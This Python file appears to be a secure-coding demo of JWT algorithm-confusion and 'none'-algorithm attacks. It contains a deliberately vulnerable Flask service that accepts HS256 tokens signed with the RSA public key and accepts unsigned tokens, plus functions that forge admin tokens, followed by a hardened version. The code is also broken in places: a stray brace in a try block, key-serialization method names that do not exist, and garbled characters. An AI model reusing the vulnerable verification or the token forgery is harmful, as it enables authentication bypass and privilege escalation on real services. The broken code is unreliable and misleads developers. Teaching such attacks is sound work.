# VULNERABLE: JWT implementation susceptible to algorithm confusion
import jwt
import json
import base64
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import serialization
class VulnerableJWTService:
def __init__(self):
# Generate RSA key pair for demonstration
self.private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048
)
self.public_key = self.private_key.public_key()
# Serialize public key for algorithm confusion attack
self.public_key_pem = self.public_key.public_key_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
self.private_key_pem = self.private_key.private_key_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption()
)
def create_rs256_token(self, payload):
"""Create a legitimate RS256 token"""
return jwt.encode(payload, self.private_key_pem, algorithm='RS256')
def verify_token_vulnerable(self, token):
"""VULNERABLE: Accepts algorithm from token header"""
try {
# CRITICAL VULNERABILITY: Using public key for verification
# without specifying algorithm allows algorithm confusion
decoded = jwt.decode(token, self.public_key_pem,
algorithms=['RS256', 'HS256']) # Allows both!
return {'valid': True, 'payload': decoded}
except jwt.InvalidTokenError as e:
return {'valid': False, 'error': str(e)}
def verify_token_flexible(self, token):
"""VULNERABLE: Dynamic algorithm selection"""
# Parse header to determine algorithm
header = json.loads(base64.b64decode(token.split('.')[0] + '=='))
algorithm = header.get('alg')
try:
if algorithm == 'RS256':
# Use public key for RSA
decoded = jwt.decode(token, self.public_key_pem,
algorithms=['RS256'])
elif algorithm == 'HS256':
# VULNERABLE: Use public key as HMAC secret!
decoded = jwt.decode(token, self.public_key_pem,
algorithms=['HS256'])
elif algorithm == 'none':
# VULNERABLE: Accept unsigned tokens
decoded = jwt.decode(token, options={"verify_signature": False})
else:
return {'valid': False, 'error': 'Unsupported algorithm'}
return {'valid': True, 'payload': decoded, 'algorithm': algorithm}
except jwt.InvalidTokenError as e:
return {'valid': False, 'error': str(e)}
# ATTACK DEMONSTRATION: Algorithm confusion exploit
def demonstrate_algorithm_confusion_attack():
# Initialize vulnerable service
service = VulnerableJWTService()
# Step 1: Create legitimate RS256 token
legitimate_payload = {
'user': 'normal_user',
'role': 'user',
'exp': 1234567890
}
legitimate_token = service.create_rs256_token(legitimate_payload)
print(f"Legitimate RS256 token: {legitimate_token}")
# Step 2: Create malicious payload
malicious_payload = {
'user': 'attacker',
'role': 'admin', # Privilege escalation!
'exp': 9999999999
}
# Step 3: Create forged HS256 token using RSA public key as HMAC secret
# This is the core of the algorithm confusion attack
forged_token = jwt.encode(malicious_payload, service.public_key_pem, algorithm='HS256')
print(f"Forged HS256 token: {forged_token}")
# Step 4: Verify tokens using vulnerable verification
print("\n--- Verification Results ---")
# Legitimate token verification
result1 = service.verify_token_vulnerable(legitimate_token)
print(f"Legitimate token verification: {result1}")
# Forged token verification - THIS SHOULD FAIL BUT MIGHT SUCCEED!
result2 = service.verify_token_vulnerable(forged_token)
print(f"Forged token verification: {result2}")
# Demonstrate flexible verification vulnerability
result3 = service.verify_token_flexible(forged_token)
print(f"Flexible verification of forged token: {result3}")
# Step 5: Show how attacker gains admin access
if result2['valid'] and result2['payload']['role'] == 'admin':
print("\nšØ ATTACK SUCCESSFUL! Attacker gained admin access!")
print(f"Attacker payload: {result2['payload']}")
else:
print("\nā
Attack failed - system properly secured")
# Additional attack vectors
def demonstrate_none_algorithm_attack():
"""Demonstrate 'none' algorithm attack"""
# Create unsigned token with 'none' algorithm
header = {"alg": "none", "typ": "JWT"}
payload = {"user": "attacker", "role": "admin", "exp": 9999999999}
# Manually construct token
header_b64 = base64.b64encode(json.dumps(header).encode()).decode().rstrip('=')
payload_b64 = base64.b64encode(json.dumps(payload).encode()).decode().rstrip('=')
# 'none' algorithm has empty signature
unsigned_token = f"{header_b64}.{payload_b64}."
print(f"Unsigned 'none' token: {unsigned_token}")
return unsigned_token
def demonstrate_key_confusion_attack():
"""Demonstrate using different keys for same algorithm"""
service = VulnerableJWTService()
# Attacker obtains public key (often exposed in JWKS endpoint)
public_key_content = service.public_key_pem.decode()
# Create malicious token using public key as HMAC secret
malicious_payload = {
'user': 'attacker',
'role': 'admin',
'iss': 'trusted-issuer',
'exp': 9999999999
}
# Sign with public key as HMAC secret
attack_token = jwt.encode(malicious_payload, public_key_content, algorithm='HS256')
print(f"Key confusion attack token: {attack_token}")
# This token will be accepted by vulnerable verification that uses
# the same public key for both RS256 and HS256 verification
return attack_token
# Flask web application demonstrating vulnerable endpoints
from flask import Flask, request, jsonify
app = Flask(__name__)
vulnerable_service = VulnerableJWTService()
@app.route('/login', methods=['POST'])
def login():
"""Login endpoint that creates RS256 tokens"""
username = request.json.get('username')
password = request.json.get('password')
# Simplified authentication (insecure for demo)
if username and password:
payload = {
'user': username,
'role': 'admin' if username == 'admin' else 'user',
'exp': 1234567890
}
token = vulnerable_service.create_rs256_token(payload)
return jsonify({'token': token})
return jsonify({'error': 'Invalid credentials'}), 401
@app.route('/protected', methods=['GET'])
def protected_endpoint():
"""Protected endpoint using vulnerable token verification"""
auth_header = request.headers.get('Authorization')
if not auth_header or not auth_header.startswith('Bearer '):
return jsonify({'error': 'No token provided'}), 401
token = auth_header[7:] # Remove 'Bearer ' prefix
# VULNERABLE: Use flexible verification
result = vulnerable_service.verify_token_flexible(token)
if not result['valid']:
return jsonify({'error': 'Invalid token'}), 401
user_data = result['payload']
return jsonify({
'message': 'Access granted',
'user': user_data['user'],
'role': user_data['role'],
'algorithm_used': result.get('algorithm', 'unknown')
})
@app.route('/admin', methods=['GET'])
def admin_endpoint():
"""Admin endpoint that can be exploited"""
auth_header = request.headers.get('Authorization')
if not auth_header or not auth_header.startswith('Bearer '):
return jsonify({'error': 'No token provided'}), 401
token = auth_header[7:]
result = vulnerable_service.verify_token_flexible(token)
if not result['valid']:
return jsonify({'error': 'Invalid token'}), 401
user_data = result['payload']
# Vulnerable role check - can be bypassed with forged tokens
if user_data.get('role') != 'admin':
return jsonify({'error': 'Admin access required'}), 403
return jsonify({
'message': 'Admin access granted',
'sensitive_data': 'This should only be accessible to real admins',
'user': user_data['user'],
'token_algorithm': result.get('algorithm')
})
if __name__ == '__main__':
print("=== JWT Algorithm Confusion Vulnerability Demo ===")
# Run attack demonstrations
demonstrate_algorithm_confusion_attack()
print("\n" + "="*50)
none_token = demonstrate_none_algorithm_attack()
print("\n" + "="*50)
key_confusion_token = demonstrate_key_confusion_attack()
print("\n=== Starting vulnerable web server ===")
print("Try the following attacks:")
print("1. Use forged HS256 tokens on /protected and /admin endpoints")
print("2. Use 'none' algorithm tokens")
print("3. Observe how algorithm confusion bypasses authentication")
app.run(debug=True, port=5000)
# SECURE: JWT implementation with proper algorithm validation
import jwt
import json
import base64
import hmac
import hashlib
from datetime import datetime, timedelta
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from typing import Dict, Any, Optional
import logging
# Configure secure logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
class SecureJWTService:
def __init__(self, algorithm: str = 'RS256'):
"""Initialize with strict algorithm enforcement"""
self.algorithm = algorithm
self.validate_algorithm_support()
# Generate separate keys for different algorithms
if algorithm == 'RS256':
self.setup_rsa_keys()
elif algorithm == 'HS256':
self.setup_hmac_keys()
else:
raise ValueError(f"Unsupported algorithm: {algorithm}")
# Security configuration
self.token_expiry = timedelta(minutes=15)
self.issuer = 'secure-jwt-service'
self.audience = 'secure-app'
# Track security events
self.security_events = []
def validate_algorithm_support(self):
"""Validate that the algorithm is supported and secure"""
supported_algorithms = ['RS256', 'ES256', 'HS256']
insecure_algorithms = ['none', 'HS1', 'RS1']
if self.algorithm not in supported_algorithms:
raise ValueError(f"Algorithm {self.algorithm} is not supported")
if self.algorithm in insecure_algorithms:
raise ValueError(f"Algorithm {self.algorithm} is insecure")
def setup_rsa_keys(self):
"""Set up RSA keys for RS256 algorithm"""
# Generate RSA key pair
self.private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048
)
self.public_key = self.private_key.public_key()
# Serialize keys
self.private_key_pem = self.private_key.private_key_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption()
)
self.public_key_pem = self.public_key.public_key_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
logger.info("RSA keys generated for RS256 algorithm")
def setup_hmac_keys(self):
"""Set up HMAC secret for HS256 algorithm"""
import secrets
# Generate cryptographically secure random secret (256 bits)
self.hmac_secret = secrets.token_bytes(32)
logger.info("HMAC secret generated for HS256 algorithm")
def create_token(self, payload: Dict[str, Any],
custom_expiry: Optional[timedelta] = None) -> str:
"""Create a JWT token with strict algorithm enforcement"""
if not isinstance(payload, dict):
raise ValueError("Payload must be a dictionary")
# Add security claims
now = datetime.utcnow()
expiry = custom_expiry or self.token_expiry
secure_payload = {
**payload,
'iss': self.issuer,
'aud': self.audience,
'iat': int(now.timestamp()),
'exp': int((now + expiry).timestamp()),
'jti': self.generate_jti() # Unique token ID
}
try:
if self.algorithm == 'RS256':
token = jwt.encode(secure_payload, self.private_key_pem,
algorithm='RS256')
elif self.algorithm == 'HS256':
token = jwt.encode(secure_payload, self.hmac_secret,
algorithm='HS256')
else:
raise ValueError(f"Token creation not supported for {self.algorithm}")
self.log_security_event('TOKEN_CREATED', {
'algorithm': self.algorithm,
'user': payload.get('user', 'unknown'),
'expiry': expiry.total_seconds()
})
return token
except Exception as e:
self.log_security_event('TOKEN_CREATION_FAILED', {
'error': str(e),
'algorithm': self.algorithm
})
raise
def verify_token(self, token: str,
validate_audience: bool = True,
validate_issuer: bool = True) -> Dict[str, Any]:
"""Verify JWT token with strict algorithm validation"""
if not token or not isinstance(token, str):
raise ValueError("Token must be a non-empty string")
# CRITICAL: Validate algorithm before verification
self.validate_token_algorithm(token)
# Prepare verification options
options = {
'verify_signature': True,
'verify_exp': True,
'verify_iat': True,
'verify_aud': validate_audience,
'verify_iss': validate_issuer
}
try:
if self.algorithm == 'RS256':
decoded = jwt.decode(
token,
self.public_key_pem,
algorithms=['RS256'], # STRICT: Only allow RS256
audience=self.audience if validate_audience else None,
issuer=self.issuer if validate_issuer else None,
options=options
)
elif self.algorithm == 'HS256':
decoded = jwt.decode(
token,
self.hmac_secret,
algorithms=['HS256'], # STRICT: Only allow HS256
audience=self.audience if validate_audience else None,
issuer=self.issuer if validate_issuer else None,
options=options
)
else:
raise ValueError(f"Verification not supported for {self.algorithm}")
# Additional security validations
self.validate_token_claims(decoded)
self.log_security_event('TOKEN_VERIFIED', {
'algorithm': self.algorithm,
'user': decoded.get('user', 'unknown'),
'jti': decoded.get('jti')
})
return decoded
except jwt.ExpiredSignatureError:
self.log_security_event('TOKEN_EXPIRED', {
'algorithm': self.algorithm
})
raise ValueError("Token has expired")
except jwt.InvalidAudienceError:
self.log_security_event('INVALID_AUDIENCE', {
'algorithm': self.algorithm
})
raise ValueError("Invalid token audience")
except jwt.InvalidIssuerError:
self.log_security_event('INVALID_ISSUER', {
'algorithm': self.algorithm
})
raise ValueError("Invalid token issuer")
except jwt.InvalidAlgorithmError:
self.log_security_event('ALGORITHM_MISMATCH', {
'expected': self.algorithm,
'token_header': self.parse_token_header(token)
})
raise ValueError("Algorithm mismatch detected")
except Exception as e:
self.log_security_event('TOKEN_VERIFICATION_FAILED', {
'error': str(e),
'algorithm': self.algorithm
})
raise ValueError("Token verification failed")
def validate_token_algorithm(self, token: str):
"""Validate that token algorithm matches expected algorithm"""
try:
header = self.parse_token_header(token)
token_algorithm = header.get('alg')
# CRITICAL: Strict algorithm validation
if token_algorithm != self.algorithm:
self.log_security_event('ALGORITHM_CONFUSION_ATTEMPT', {
'expected': self.algorithm,
'provided': token_algorithm,
'severity': 'CRITICAL'
})
raise ValueError(f"Algorithm confusion detected. Expected {self.algorithm}, got {token_algorithm}")
# Check for dangerous algorithms
dangerous_algorithms = ['none', 'HS1', 'RS1']
if token_algorithm in dangerous_algorithms:
self.log_security_event('DANGEROUS_ALGORITHM_DETECTED', {
'algorithm': token_algorithm,
'severity': 'CRITICAL'
})
raise ValueError(f"Dangerous algorithm detected: {token_algorithm}")
except json.JSONDecodeError:
raise ValueError("Invalid token header format")
def parse_token_header(self, token: str) -> Dict[str, Any]:
"""Parse JWT header safely"""
try:
header_b64 = token.split('.')[0]
# Add padding if necessary
header_b64 += '=' * (4 - len(header_b64) % 4)
header_json = base64.b64decode(header_b64).decode('utf-8')
return json.loads(header_json)
except (IndexError, json.JSONDecodeError, ValueError) as e:
raise ValueError(f"Invalid token format: {e}")
def validate_token_claims(self, payload: Dict[str, Any]):
"""Perform additional validation on token claims"""
required_claims = ['iss', 'aud', 'iat', 'exp', 'jti']
for claim in required_claims:
if claim not in payload:
raise ValueError(f"Missing required claim: {claim}")
# Validate token age
max_token_age = timedelta(hours=24).total_seconds()
token_age = datetime.utcnow().timestamp() - payload['iat']
if token_age > max_token_age:
self.log_security_event('TOKEN_TOO_OLD', {
'age_hours': token_age / 3600,
'jti': payload.get('jti')
})
raise ValueError("Token is too old")
# Validate role claims for security
if payload.get('role') in ['admin', 'superadmin']:
self.log_security_event('HIGH_PRIVILEGE_TOKEN_USED', {
'user': payload.get('user'),
'role': payload.get('role'),
'jti': payload.get('jti')
})
def generate_jti(self) -> str:
"""Generate unique token identifier"""
import secrets
return secrets.token_urlsafe(16)
def log_security_event(self, event_type: str, details: Dict[str, Any]):
"""Log security events for monitoring"""
event = {
'timestamp': datetime.utcnow().isoformat(),
'event_type': event_type,
'details': details
}
self.security_events.append(event)
# Log to system logger
if event_type in ['ALGORITHM_CONFUSION_ATTEMPT', 'DANGEROUS_ALGORITHM_DETECTED']:
logger.error(f"SECURITY ALERT: {event_type} - {details}")
else:
logger.info(f"Security event: {event_type} - {details}")
def get_security_report(self) -> Dict[str, Any]:
"""Get security events report"""
return {
'algorithm_enforced': self.algorithm,
'total_events': len(self.security_events),
'recent_events': self.security_events[-10:], # Last 10 events
'report_generated': datetime.utcnow().isoformat()
}
# SECURE: Flask application with proper JWT handling
from flask import Flask, request, jsonify
from functools import wraps
app = Flask(__name__)
# Initialize secure JWT service with RS256
secure_jwt_service = SecureJWTService(algorithm='RS256')
def require_auth(f):
"""Secure authentication decorator"""
@wraps(f)
def decorated_function(*args, **kwargs):
auth_header = request.headers.get('Authorization')
if not auth_header or not auth_header.startswith('Bearer '):
return jsonify({'error': 'Authentication required'}), 401
token = auth_header[7:] # Remove 'Bearer ' prefix
try:
# Strict token verification
payload = secure_jwt_service.verify_token(token)
request.current_user = payload
return f(*args, **kwargs)
except ValueError as e:
return jsonify({
'error': 'Authentication failed',
'message': str(e)
}), 401
return decorated_function
def require_role(required_role: str):
"""Role-based authorization decorator"""
def decorator(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if not hasattr(request, 'current_user'):
return jsonify({'error': 'Authentication required'}), 401
user_role = request.current_user.get('role')
if user_role != required_role:
secure_jwt_service.log_security_event('UNAUTHORIZED_ACCESS_ATTEMPT', {
'user': request.current_user.get('user'),
'required_role': required_role,
'user_role': user_role
})
return jsonify({'error': 'Insufficient permissions'}), 403
return f(*args, **kwargs)
return decorated_function
return decorator
@app.route('/login', methods=['POST'])
def secure_login():
"""Secure login endpoint"""
data = request.get_json()
username = data.get('username')
password = data.get('password')
# Implement proper authentication here
# This is simplified for demonstration
if username and password:
# In production, verify credentials against secure storage
role = 'admin' if username == 'admin' else 'user'
payload = {
'user': username,
'role': role
}
try:
token = secure_jwt_service.create_token(payload)
return jsonify({
'token': token,
'expires_in': '15m',
'token_type': 'Bearer',
'algorithm': secure_jwt_service.algorithm
})
except Exception as e:
return jsonify({'error': 'Token creation failed'}), 500
return jsonify({'error': 'Invalid credentials'}), 401
@app.route('/protected', methods=['GET'])
@require_auth
def secure_protected():
"""Protected endpoint with secure authentication"""
return jsonify({
'message': 'Access granted with secure authentication',
'user': request.current_user['user'],
'role': request.current_user['role'],
'algorithm': secure_jwt_service.algorithm,
'token_id': request.current_user.get('jti')
})
@app.route('/admin', methods=['GET'])
@require_auth
@require_role('admin')
def secure_admin():
"""Admin endpoint with secure role validation"""
return jsonify({
'message': 'Secure admin access granted',
'sensitive_data': 'This is properly protected admin data',
'user': request.current_user['user'],
'algorithm': secure_jwt_service.algorithm
})
@app.route('/security/report', methods=['GET'])
@require_auth
@require_role('admin')
def security_report():
"""Security monitoring endpoint"""
return jsonify(secure_jwt_service.get_security_report())
@app.errorhandler(Exception)
def handle_error(error):
"""Global error handler"""
secure_jwt_service.log_security_event('APPLICATION_ERROR', {
'error': str(error),
'endpoint': request.endpoint
})
return jsonify({
'error': 'Internal server error'
}), 500
if __name__ == '__main__':
print("=== Secure JWT Service Started ===")
print(f"Algorithm enforced: {secure_jwt_service.algorithm}")
print("Algorithm confusion attacks are prevented")
print("Security monitoring is active")
app.run(debug=False, port=5000) # Debug disabled for security